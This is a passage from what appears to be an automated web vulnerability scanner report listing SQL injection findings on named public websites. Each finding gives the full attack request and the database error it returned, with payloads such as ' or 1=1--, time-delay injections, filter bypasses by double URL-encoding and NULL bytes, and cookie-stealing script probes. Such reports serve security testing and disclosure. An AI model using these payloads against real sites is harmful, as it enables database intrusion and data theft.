<td valign="top"><img src="/img/tabs_bot_off.gif" width="358" height="14" usemap="#bottomtool" alt="Account Management Navigation" border="0"><map name="bottomtool"><area shape="polygon" coords="287, 13, 301, 0, 347, 0, 333, 13, 287, 13" href="http://www.TheCounter.com/login.php"><area shape="polygon" coords="182, 13, 195, 0, 297, 0, 285, 13, 182, 13" href="http://www.TheCounter.com/del_account.php"><area shape="polygon" coords="80, 13, 95, 0, 193, 0
...[SNIP]...

1.139. http://www.thedailybeast.com/author/lloyd-grove/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thedailybeast.com
Path:   /author/lloyd-grove/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload 14879953'%20or%201%3d1--%20 was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /author/lloyd-grove14879953'%20or%201%3d1--%20/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Fri, 18 Mar 2011 16:29:25 GMT
Content-Length: 10642
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<!-- SELECT t1.name from tags t1, tags_to_items tti
                    WHERE tti.items_id =
                    AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7' at line 3 -->
...[SNIP]...

1.140. http://www.thedailybeast.com/author/lloyd-grove/'"--> [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thedailybeast.com
Path:   /author/lloyd-grove/'"--></style></script><script>alert(document.cookie)</script>

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload 43847644'%20or%201%3d1--%20 was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /author/lloyd-grove43847644'%20or%201%3d1--%20/'"--></style></script><script>alert(document.cookie)</script> HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Fri, 18 Mar 2011 16:29:23 GMT
Content-Length: 10703
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<!-- SELECT t1.name from tags t1, tags_to_items tti
                    WHERE tti.items_id =
                    AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND tti.tags_id = t1.id
                    AND tti.tags_types_id = 7' at line 3 -->
...[SNIP]...

1.142. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [&CCID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The &CCID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the &CCID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie' HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:39:08 GMT
Server: Microsoft-IIS/6.0
Content-Length: 11360
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=GCABGAJBDFMPNPDENFCBOPPJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

1.143. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [&CCID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The &CCID parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the &CCID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503%2527&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:34:39 GMT
Server: Microsoft-IIS/6.0
Content-Length: 14344
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=KIOAGAJBCHLLBCCDPEOLJEAA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

1.144. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [CLK parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The CLK parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CLK parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818%00'&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 25 Mar 2011 16:54:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 17449
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSASBQADT=ILMPINCCIPFLIKDEPEIMHFOB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

Request 2

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818%00''&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 16:54:35 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31819
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSASBQADT=HNMPINCCJKNGCCMLMOABADJG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

1.145. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [QTR parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The QTR parameter appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the QTR parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ',0,0,0)waitfor%20delay'0%3a0%3a20'--&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:37:06 GMT
Server: Microsoft-IIS/6.0
Content-Length: 6359
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=PHPAGAJBAPLILNDALOLMMLOC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

1.146. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q="

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:37:30 GMT
Server: Microsoft-IIS/6.0
Content-Length: 17602
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=MHPAGAJBAHHKEJHBLHEPAJFA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

1.147. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload 75850100'%20or%201%3d1--%20 was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)75850100'%20or%201%3d1--%20
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:34:39 GMT
Server: Microsoft-IIS/6.0
Content-Length: 6087
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=EJOAGAJBDJPDLLJKGCMMOGMB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

1.148. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 25 Mar 2011 16:52:08 GMT
Server: Microsoft-IIS/6.0
Content-Length: 3534
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSASBQADT=ECMPINCCIEFEOIDFDDKPBLBC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

Request 2

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 16:52:25 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31819
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSASBQADT=ADMPINCCMJAMDOOMANDHJIDK; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

1.149. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?1'=1 HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:33:00 GMT
Server: Microsoft-IIS/6.0
Content-Length: 5186
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=JINAGAJBNPNBGICGPPNMFEAN; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

Request 2

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?1''=1 HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Mar 2011 16:33:23 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31819
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=OLNAGAJBBJMCJOKKNMHGOIGO; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

1.150. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie&1')waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:41:33 GMT
Server: Microsoft-IIS/6.0
Content-Length: 4861
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=KKABGAJBEJFLHGKDIKIBCFOD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...

1.151. http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ,0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie&1,0,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:33:09 GMT
Server: Microsoft-IIS/6.0
Content-Length: 319
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=LLNAGAJBJIIBCAENBGEEIOFN; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80004005'</font>
<p>
<font face="Arial" size=2>Invalid connection string attribute</font
...[SNIP]...

1.152. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
